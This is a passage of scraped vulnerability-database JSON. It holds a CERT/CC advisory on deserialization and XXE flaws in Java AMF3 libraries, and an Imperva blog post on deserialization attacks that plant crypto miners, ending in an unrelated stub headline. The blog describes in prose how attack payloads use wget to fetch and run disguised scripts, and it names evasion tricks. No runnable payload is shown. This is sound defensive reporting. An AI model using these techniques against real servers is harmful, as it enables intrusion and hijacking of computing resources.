"AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:PARTIAL/"}}], "cert": [{"lastseen": "2023-12-03T17:26:34", "description": "### Overview\n\nSeveral Java implementations of AMF3 are vulnerable to insecure deserialization and XML external entities references.\n\n### Description\n\nSeveral Java implementations of Action Message Format (AMF3) are vulnerable to one or more of the following implementation errors:\n\n[**CWE-502**](<http://cwe.mitre.org/data/definitions/502.html>)**: Deserialization of Untrusted Data** \n \nSome Java implementations of AMF3 deserializers derive class instances from `java.io.Externalizable` rather than the [AMF3 specification](<http://www.adobe.com/go/amfspec>)'s recommendation of `flash.utils.IExternalizable`. A remote attacker with the ability to spoof or control an RMI server connection may be able to send serialized Java objects that execute arbitrary code when deserialized. \n \nThe reporter has identified the following products and versions as being affected, and CVE ID have been assigned as follows: \n\\- Atlassian JIRA, versions from 4.2.4 prior to version 6.3.0 - CVE-2017-5983 \n\\- Flamingo amf-serializer by Exadel, version 2.2.0 - CVE-2017-3201 \n\\- GraniteDS, version 3.1.1.GA - CVE-2017-3199 \n\\- Pivotal/Spring spring-flex - CVE-2017-3203 \n\\- WebORB for Java by Midnight Coders, version 5.1.1.0 - CVE-2017-3207 \n \nProducts using these libraries may also be impacted. \n \n[**CWE-913**](<http://cwe.mitre.org/data/definitions/913.html>)**: Improper Control of Dynamically-Managed Code Resources** \n \nSome Java implementations of AMF3 deserializers may allow instantiation of arbitrary classes via their public parameter-less constructor and subsequently call arbitrary Java Beans setter methods. The ability to exploit this vulnerability depends on the availability of classes in the class path that make use of deserialization. A remote attacker with the ability to spoof or control information may be able to send serialized Java objects with pre-set properties that result in arbitrary code execution when deserialized. \n \nThe reporter has identified the following products and versions as being affected, and CVE ID have been assigned as follows: \n\\- Flamingo amf-serializer by Exadel, version 2.2.0 - CVE-2017-3202 \n\\- Flex BlazeDS , versions 4.6.0.23207 and 4.7.2 - CVE-2017-5641 \n\\- GraniteDS, version 3.1.1.GA - CVE-2017-3200 \n \nProducts using these libraries may also be impacted. \n \n[**CWE-611**](<https://cwe.mitre.org/data/definitions/611.html>)**: Improper Restriction of XML External Entity Reference ('XXE')** \n \nSome Java implementations of AMF3 deserializers allow external entity references (XXEs) from XML documents embedded within AMF3 messages. If the XML parsing is handled incorrectly it could potentially expose sensitive data on the server, denial of service, or server side request forgery. \n \n\\- Flamingo amf-serializer by Exadel, version 2.2.0 - CVE-2017-3206 \n\\- Flex BlazeDS , version 4.6.0.23207 - CVE-2015-3269 \n\\- GraniteDS, version 3.1.1.GA - CVE-2016-2340 (see [VU#279472](<http://www.kb.cert.org/vuls/id/279472>)) \n\\- WebORB for Java by Midnight Coders, version 5.1.1.0 - CVE-2017-3208 \n \nProducts using these libraries may also be impacted. \n \nMore information is provided in the researcher's [advisory](<http://codewhitesec.blogspot.com/2017/04/amf.html>). \n \n--- \n \n### Impact\n\nA remote attacker with the ability to spoof or control a server connection may be able to send serialized Java objects that execute arbitrary code when deserialized. \n \n--- \n \n### Solution\n\n**Apply an update if available** \n \nCERT/CC recommends applying an update or patch to your product if available. Some vendors have responded that only out-of-support versions of products are impacted. In these cases, CERT/CC recommends updating your product to the latest supported version. \n \nMore details are included for each vendor in the vendor records below. \n \n--- \n \n**Developers should use an updated JDK** \n \nDevelopers should use an updated Java development kit (JDK). JDK 8 update 121, JDK 7 update 131 and JDK 6 update 141 implement basic serialization blacklisting filters, while more serialization protection measures are expected in the upcoming Java 9. For more information, please see [JEP 290](<http://openjdk.java.net/jeps/290>). \n \n**Developers should be suspicious of deserialized data from untrusted sources** \n \nDevelopers should in general be very suspicious of deserialized data from an untrusted source. For best practices, see the [_CERT Oracle Coding Standard for Java_](<https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=27492407>) guidelines for Serialization, especially rules [_SER12-J_](<https://www.securecoding.cert.org/confluence/display/java/SER12-J.+Prevent+deserialization+of+untrusted+classes>) and [_SER13-J_](<https://www.securecoding.cert.org/confluence/display/java/SER13-J.+Treat+data+to+be+deserialized+as+potentially+malicious+by+default>). \n** \nUse firewall rules or filesystem restrictions** \n \nSystem administrators may be able to mitigate this issue for some applications by restricting access to the network and/or filesystem. If an affected application utilizes an open port accepting serialized objects, restricting access to the application may help mitigate the issue. \n \n--- \n \n### Vendor Information\n\n307983\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Adobe __ Affected\n\nNotified: March 28, 2017 Updated: April 03, 2017 \n\n**Statement Date: March 31, 2017**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nAffected versions (< 4.7) of Adobe Flex BlazeDS are no longer supported. Any affected users should upgrade to a newer version of BlazeDS now supported by the Apache Software Foundation.\n\n### Apache Software Foundation __ Affected\n\nNotified: March 28, 2017 Updated: April 07, 2017 \n\n**Statement Date: April 04, 2017**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nApache Flex BlazeDS [version 4.7.3](<https://flex.apache.org/download-blazeds.html>) addresses CVE-2017-5641 by restricting classes to only those whitelisted. Affected users are encouraged to upgrade.\n\nThe XXE vulnerability (CVE-2015-3269) was previously addressed in version 4.7.1.\n\n### Vendor References\n\n * <https://issues.apache.org/jira/browse/FLEX-35290>\n * <http://www.apache.org/dyn/closer.lua/flex/BlazeDS/4.7.3/>\n * <http://apache-flex-users.2333346.n4.nabble.com/CVE-2015-3269-Apache-Flex-BlazeDS-Insecure-Xml-Entity-Expansion-Vulnerability-td10976.html>\n * <https://flex.apache.org/download-blazeds.html>\n\n### Atlassian __ Affected\n\nUpdated: April 07, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAtlassian has identified that JIRA versions from 4.2.4 prior to version 6.3.0 are impacted. These versions are all currently unsupported.\n\n### Vendor Information \n\nAtlassian has released [JIRA Security Advisory 2017-03-09](<https://confluence.atlassian.com/display/JIRA063/JIRA+Security+Advisory+2017-03-09>) for this issue. CVE-2017-5983 was assigned according to ticket [JRA-64077](<https://jira.atlassian.com/browse/JRA-64077?src=confmacro>).\n\n### Vendor References\n\n * <https://confluence.atlassian.com/display/JIRA063/JIRA+Security+Advisory+2017-03-09>\n * <https://jira.atlassian.com/browse/JRA-64077?src=confmacro>\n\n### VMware __ Affected\n\nNotified: March 16, 2017 Updated: April 14, 2017 \n\n**Statement Date: April 14, 2017**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nVMware uses Flex BlazeDS, and has released security advisory [VMSA-2017-0007](<https://www.vmware.com/security/advisories/VMSA-2017-0007.html>) to address this issue.\n\n### Vendor References\n\n * <https://www.vmware.com/security/advisories/VMSA-2017-0007.html>\n\n### Exadel Unknown\n\nNotified: March 28, 2017 Updated: March 28, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Granite Data Services Unknown\n\nNotified: March 16, 2017 Updated: March 16, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hewlett Packard Enterprise Unknown\n\nNotified: March 28, 2017 Updated: March 28, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Midnight Coders __ Unknown\n\nNotified: March 16, 2017 Updated: April 03, 2017 \n\n**Statement Date: March 16, 2017**\n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nThe demonstrated code would not be able to be able to cause any harm for the reason that calling `setAutoCommit( true )` requires a connection object which is not even initialized at that time (see lines 4067-4087 at: `<http://www.docjar.com/html/api/com/sun/rowset/JdbcRowSetImpl.java.html>`). \n \nAdditionally, in our implementation all `com.sun.*` and` java.*` classes are excluded from deserialization.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Pivotal Unknown\n\nNotified: March 28, 2017 Updated: March 28, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SonicWall Unknown\n\nNotified: March 28, 2017 Updated: March 28, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C \nTemporal | 8.4 | E:POC/RL:U/RC:C \nEnvironmental | 6.3 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <http://codewhitesec.blogspot.com/2017/04/amf.html>\n * <http://openjdk.java.net/jeps/290>\n * <http://www.kb.cert.org/vuls/id/279472>\n * <http://www.adobe.com/go/amfspec>\n * <https://cwe.mitre.org/data/definitions/502.html>\n * <https://cwe.mitre.org/data/definitions/913.html>\n * <https://cwe.mitre.org/data/definitions/611.html>\n\n### Acknowledgements\n\nThanks to Markus Wulftange for reporting this vulnerability.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-3269](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-3269>), [CVE-2016-2340](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-2340>), [CVE-2017-5641](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-5641>), [CVE-2017-5983](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-5983>), [CVE-2017-3199](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-3199>), [CVE-2017-3200](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-3200>), [CVE-2017-3201](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-3201>), [CVE-2017-3202](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-3202>), [CVE-2017-3203](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-3203>), [CVE-2017-3206](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-3206>), [CVE-2017-3207](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-3207>), [CVE-2017-3208](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-3208>) \n---|--- \n**Date Public:** | 2017-04-04 \n**Date First Published:** | 2017-04-04 \n**Date Last Updated: ** | 2017-04-14 15:08 UTC \n**Document Revision: ** | 90 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-04T00:00:00", "type": "cert", "title": "Action Message Format (AMF3) Java implementations are vulnerable to insecure deserialization and XML external entities references", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3269", "CVE-2016-2340", "CVE-2017-3199", "CVE-2017-3200", "CVE-2017-3201", "CVE-2017-3202", "CVE-2017-3203", "CVE-2017-3206", "CVE-2017-3207", "CVE-2017-3208", "CVE-2017-5641", "CVE-2017-5983"], "modified": "2017-04-14T15:08:00", "id": "VU:307983", "href": "https://www.kb.cert.org/vuls/id/307983", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2018-01-25T09:59:26", "description": "Imperva\u2019s research group is constantly monitoring new web application vulnerabilities. In doing so, we\u2019ve noticed at least four major insecure deserialization vulnerabilities that were published in the past year.\n\nOur analysis shows that, in the past three months, the number of deserialization attacks has grown by 300 percent on average, turning them into a serious security risk to web applications.\n\nTo make things worse, many of these attacks are now launched with the intent of installing crypto-mining malware on vulnerable web servers, which gridlocks their CPU usage.\n\nIn this blog post we will explain what insecure deserialization vulnerabilities are, show the growing trend of attacks exploiting these vulnerabilities and explain what attackers do to exploit them (including real-life attack examples).\n\n## What Is Serialization?\n\nThe process of serialization converts a \u201clive\u201d object (structure and/or state), like a Java object, into a format that can be sent over the network, or stored in memory or on disk. Deserialization converts the format back into a \u201clive\u201d object.\n\nThe purpose of serialization is to preserve an object, meaning that the object will exist outside the lifetime of the local machine on which it is created.\n\nFor example, when withdrawing money from an ATM, the information of the account holder and the required operation is stored in a local object. Before this object is sent to the main server, it is serialized in order to perform and approve the needed operations. The server then deserializes the object to complete the operation.\n\n## Types of Serialization\n\nThere are many types of [serialization](<https://en.wikipedia.org/wiki/Serialization#Serialization_formats>) available, depending on the object which is being serialized and on the purpose. Almost all modern programming languages support serialization. In Java for example an object is converted into a compact representation using byte stream, and the byte stream can then be reverted back into a copy of that object.\n\nOther types of serialization include converting an object into a hierarchical format like JSON or XML. The advantage of this serialization is that the serialized objects can be read as plain text, instead of a byte stream.\n\n## Deserialization Vulnerabilities from the Past Three Months\n\nIn the [OWASP top 10 security risks of 2017](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) insecure deserialization came in at [eighth place](<https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization>) and rightfully so as we argued in our [previous blog](<https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/>) about the state of web application vulnerabilities in 2017.\n\nIn 2017, major new vulnerabilities related to insecure serialization, mostly in Java, were published (see Figure 1).\n\n**Name** | **Release Date (Day/Month/Year)** | **Vulnerability details** \n---|---|--- \nCVE-2017-12149 | 01/08/2017 | Vulnerability in the JBoss Application Server allows execution of arbitrary code via crafted serialized data because the HTTP Invoker does not restrict classes for which it performs deserialization \nCVE-2017-10271 | 21/06/2017 | Vulnerability in the Oracle WebLogic Server allows execution of arbitrary code due to insufficient sanitizing of user supplied inputs in the wls-wsat component \nCVE-2017-9805\n\n | 21/06/2017 | The REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads. \nCVE-2017-7504 | 05/04/2017 | The HTTPServerILServlet.java in JMS allows remote attackers to execute arbitrary code via crafted serialized data because it does not restrict the classes for which it performs deserialization \n \n_Figure 1: CVEs related to insecure deserialization_\n\nIn order to understand the magnitude of these vulnerabilities, we analyzed attacks from the past three months (October to December of 2017) that try to exploit insecure deserialization. A key observation is the _steep_ increase of deserialization attacks in the past few months, as can be seen in the Figure 2.\n\n \n_Figure 2: Insecure deserialization attacks over the course of three months_\n\nMost of the attackers used no attack vectors other than insecure deserialization. We noticed that each attacker was trying to exploit different vulnerabilities, with the above-mentioned CVEs being the most prevalent.\n\nFor a full list of CVEs related to insecure deserialization from the past few years see Figure 3.\n\n**Name** | **Relevant System** | **Public Exploit** | **Name** | **Relevant System** | **Public Exploit** \n---|---|---|---|---|--- \nCVE-2017-9844 | SAP NetWeaver | Yes | CVE-2016-2170 | Apache OFBiz | No \nCVE-2017-9830 | Code42 CrashPlan | No | CVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No \nCVE-2017-9805 | Apache Struts | Yes | CVE-2016-2000 | HP Asset Manager | No \nCVE-2017-7504 | Red Hat JBoss | Yes | CVE-2016-1999 | HP Release Control | No \nCVE-2017-5878 | Apache OpenMeetings | Yes | CVE-2016-1998 | HP Service Manager | No \nCVE-2017-5645 | Apache Log4j | No | CVE-2016-1997 | HP Operations Orchestration | No \nCVE-2017-5641 | Apache BlazeDS | Yes | CVE-2016-1986 | HP Continuous Delivery Automation | No \nCVE-2017-5586 | OpenText Documentum D2 | Yes | CVE-2016-1985 | HP Operations Manager | No \nCVE-2017-3159 | Apache Camel | Yes | CVE-2016-1487 | Lexmark Markvision Enterprise | No \nCVE-2017-3066 | Adobe ColdFusion | Yes | CVE-2016-1291 | Cisco Prime Infrastructure | Yes \nCVE-2017-2608 | Jenkins | Yes | CVE-2016-0958 | Adobe Experience Manager | No \nCVE-2017-12149 | Red Hat JBoss | Yes | CVE-2016-0788 | Jenkins | Yes \nCVE-2017-11284 | Adobe ColdFusion | No | CVE-2016-0779 | Apache TomEE | No \nCVE-2017-11283 | Adobe ColdFusion | No | CVE-2016-0714 | Apache Tomcat | No \nCVE-2017-1000353 | CloudBees Jenkins | Yes | CVE-2015-8765 | McAfee ePolicy Orchestrator | No \nCVE-2016-9606 | Resteasy | Yes | CVE-2015-8581 | Apache TomEE | No \nCVE-2016-9299 | Jenkins | Yes | CVE-2015-8545 | NetApp | No \nCVE-2016-8749 | Jackson (JSON) | Yes | CVE-2015-8360 | Atlassian Bamboo | No \nCVE-2016-8744 | Apache Brooklyn | Yes | CVE-2015-8238 | Unify OpenScape | No \nCVE-2016-8735 | Apache Tomcat JMX | Yes | CVE-2015-8237 | Unify OpenScape | No \nCVE-2016-7462 | VMWare vRealize Operations | No | CVE-2015-8103 | Jenkins | Yes \nCVE-2016-6809 | Apache Tika | No | CVE-2015-7501 | Red Hat JBoss | Yes \nCVE-2016-5229 | Atlassian Bamboo | Yes | CVE-2015-7501 | Oracle Application Testing Suite | No \nCVE-2016-5004 | Apache Archiva | Yes | CVE-2015-7450 | IBM Websphere | Yes \nCVE-2016-4385 | HP Network Automation | No | CVE-2015-7253 | Commvault Edge Server | Yes \nCVE-2016-4372 | HP iMC | No | CVE-2015-6934 | VMWare vCenter/vRealize | No \nCVE-2016-3642 | Solarwinds Virtualization Manager | Yes | CVE-2015-6576 | Atlassian Bamboo | No \nCVE-2016-3461 | Oracle MySQL Enterprise Monitor | Yes | CVE-2015-6555 | Symantec Endpoint Protection Manager | Yes \nCVE-2016-3427 | JMX | Yes | CVE-2015-6420 | Cisco (various frameworks) | No \nCVE-2016-3415 | Zimbra Collaboration | No | CVE-2015-5348 | Apache Camel | No \nCVE-2016-2510 | Red Hat JBoss BPM Suite | No | CVE-2015-5254 | Apache ActiveMQ | No \nCVE-2016-2173 | Spring AMPQ | No | CVE-2015-4852 | Oracle WebLogic | Yes \nCVE-2016-2170 | Apache OFBiz | No | CVE-2015-3253 | Jenkins | Yes \nCVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No | CVE-2012-4858 | IBM Congnos BI | No \n \n_Figure 3: CVEs related to insecure deserialization_\n\n## Deserialization Attacks in the Wild\n\nMost of the attacks that we saw are related to byte-stream serialization of Java objects. Also, we saw some attacks related to serialization to XML and other formats, see Figure 4.\n\n \n_Figure 4: Distribution of vulnerabilities over different serialization formats_\n\nIn the following attack (see Figure 5) the attacker is trying to exploit CVE-2017-10271. The payload is sent in the HTTP request\u2019s body using a serialized Java object through XML representation.\n\n[![Attack vector containing serialized java array into XML fig 5](https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-serialized-java-array-into-XML-fig-5.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-serialized-java-array-into-XML-fig-5.png>)\n\n_Figure 5: Attack vector containing a serialized java array into an XML_\n\nThe fact that this is a Java array can be seen by the hierarchical structure of the parameters, with the suffix of **\u201cjava/void/array/void/string\u201d**. The attacker is trying to run a bash script on the attacked server.\n\nThis bash script tries to send an HTTP request using \u201cwget\u201d OS command, download a shell script disguised as a picture file (note the jpg file extension) and run it. Few interesting notes can be made examining this command:\n\n * The existence of shell and \u201cwget\u201d commands indicate that this payload is targeting Linux systems\n * Using a picture file extension is usually done to evade security controls\n * The **\u201c-q\u201d** parameter to \u201cwget\u201d stands for \u201cquiet\u201d, this means that \u201cwget\u201d will have no output to the console, hence it will be harder to note that such a request was even made. Once the downloaded script runs the server is infected with a crypto mining malware trying to mine Monero digital coins (a crypto currency similar to Bitcoin).\n\nThe next script (see Figure 6) tries to exploit the same vulnerability, but this time the payload is targeting Windows servers using cmd.exe and Powershell commands to download the malware and run it.\n\n[![Attack vector infect Windows server with crypto mining malware fig 6](https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-infect-Windows-server-with-crypto-mining-malware-fig-6.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-infect-Windows-server-with-crypto-mining-malware-fig-6.png>)\n\n_Figure 6: Attack vector trying to infect Windows server with crypto mining malware_\n\nThis indicates that there are two different infection methods for Windows and Linux server, each system with its designated script.\n\nAnother example is the following payload (Figure 7) that we pulled from an attack trying to exploit a [deserialization vulnerability](<http://seclists.org/oss-sec/2016/q1/461>) with a Java serialized object.\n\n[![Attack vector containing java serialized object](https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-java-serialized-object.jpg)](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-java-serialized-object.jpg>)\n\n_Figure 7: Attack vector containing a Java serialized object trying to download a crypto miner_\n\nThe \u201cbad\u201d encoding is an artifact of Java serialization, where the object is represented in the byte stream.\n\nStill, we can see a script in plain text marked in yellow. Shown as an image below is a variable that defines an internal field separator, where in this case it is just a variable for space. The variable is probably used instead of a space to try to make the payload harder to detect.\n\n[![](https://www.imperva.com/blog/wp-content/uploads/2018/01/insert-into-paragraph.jpg)](<https://www.imperva.com/blog/wp-content/uploads/2018/01/insert-into-paragraph.jpg>)\n\nJust as in the previous examples, this Bash script targets Linux servers that send an HTTP request using \u201cwget\u201d to download a crypto miner.\n\n## Beyond Insecure Deserialization\n\nThe common denominator of the attacks above is that attackers are trying to infect the server with a crypto mining malware by using an insecure deserialization vulnerability. However insecure deserialization is not the only method to achieve this goal.\n\nBelow (Figure 8) we see an example of another attack payload, this time at the \u201cContent-Type\u201d header.\n\n[![Attack vector using RCE vulnerability of Apache Struts fig 8](https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-using-RCE-vulnerability-of-Apache-Struts-fig-8.jpg)](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-using-RCE-vulnerability-of-Apache-Struts-fig-8.jpg>)\n\n_Figure 8: Attack vector using an RCE vulnerability of Apache Struts_\n\nThis attack tries to exploit **CVE-2017-5638**, a well-known RCE vulnerability related to Apache Struts which was published in March 2017 and was covered in a [previous blog post](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>).\n\nWhen it was originally published we saw no indications of crypto miners in the attacks\u2019 payloads related to this CVE, and most of the payloads were reconnaissance attacks.\n\nHowever, in this attack the payload (marked in yellow above) is very similar to the payload from the previous example. Using the same remote server and the exact same script, it infected the server with crypto mining malware.\n\nThis old attack method with a new payload suggests a new trend in the cyber arena \u2013 attackers try to exploit RCE vulnerabilities, new and old, to turn vulnerable servers into crypto miners and get a faster ROI for their \u201ceffort\u201d.\n\n## Recommendations\n\nGiven the many new vulnerabilities related to insecure deserialization that were discovered this year, and its appearance in the OWASP top 10 security risks, we expect to see newer related vulnerabilities released in 2018. In the meantime, organizations using affected servers are advised to use the latest patch to mitigate these vulnerabilities.\n\nAn alternative to manual patching is virtual patching. Virtual patching actively protects web applications from attacks, reducing the window of exposure and decreasing the cost of emergency patches and fix cycles.\n\nA WAF that provides virtual patching doesn\u2019t interfere with the normal application workflow, and keeps the site protected while allowing the site owners to control the patching process timeline.\n\nLearn more about how to protect your web applications from vulnerabilities with [Imperva WAF solutions](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>).", "cvss3": {}, "published": "2018-01-24T17:45:08", "type": "impervablog", "title": "Deserialization Attacks Surge Motivated by Illegal Crypto-mining", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4858", "CVE-2015-3253", "CVE-2015-4852", "CVE-2015-5254", "CVE-2015-5348", "CVE-2015-6420", "CVE-2015-6555", "CVE-2015-6576", "CVE-2015-6934", "CVE-2015-7253", "CVE-2015-7450", "CVE-2015-7501", "CVE-2015-8103", "CVE-2015-8237", "CVE-2015-8238", "CVE-2015-8360", "CVE-2015-8545", "CVE-2015-8581", "CVE-2015-8765", "CVE-2016-0714", "CVE-2016-0779", "CVE-2016-0788", "CVE-2016-0958", "CVE-2016-1291", "CVE-2016-1487", "CVE-2016-1985", "CVE-2016-1986", "CVE-2016-1997", "CVE-2016-1998", "CVE-2016-1999", "CVE-2016-2000", "CVE-2016-2003", "CVE-2016-2170", "CVE-2016-2173", "CVE-2016-2510", "CVE-2016-3415", "CVE-2016-3427", "CVE-2016-3461", "CVE-2016-3642", "CVE-2016-4372", "CVE-2016-4385", "CVE-2016-5004", "CVE-2016-5229", "CVE-2016-6809", "CVE-2016-7462", "CVE-2016-8735", "CVE-2016-8744", "CVE-2016-8749", "CVE-2016-9299", "CVE-2016-9606", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-11283", "CVE-2017-11284", "CVE-2017-12149", "CVE-2017-2608", "CVE-2017-3066", "CVE-2017-3159", "CVE-2017-5586", "CVE-2017-5638", "CVE-2017-5641", "CVE-2017-5645", "CVE-2017-5878", "CVE-2017-7504", "CVE-2017-9805", "CVE-2017-9830", "CVE-2017-9844"], "modified": "2018-01-24T17:45:08", "id": "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "href": "https://www.imperva.com/blog/2018/01/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}

VMWare Fixes Critical RCE in vCenter Server

Description

Related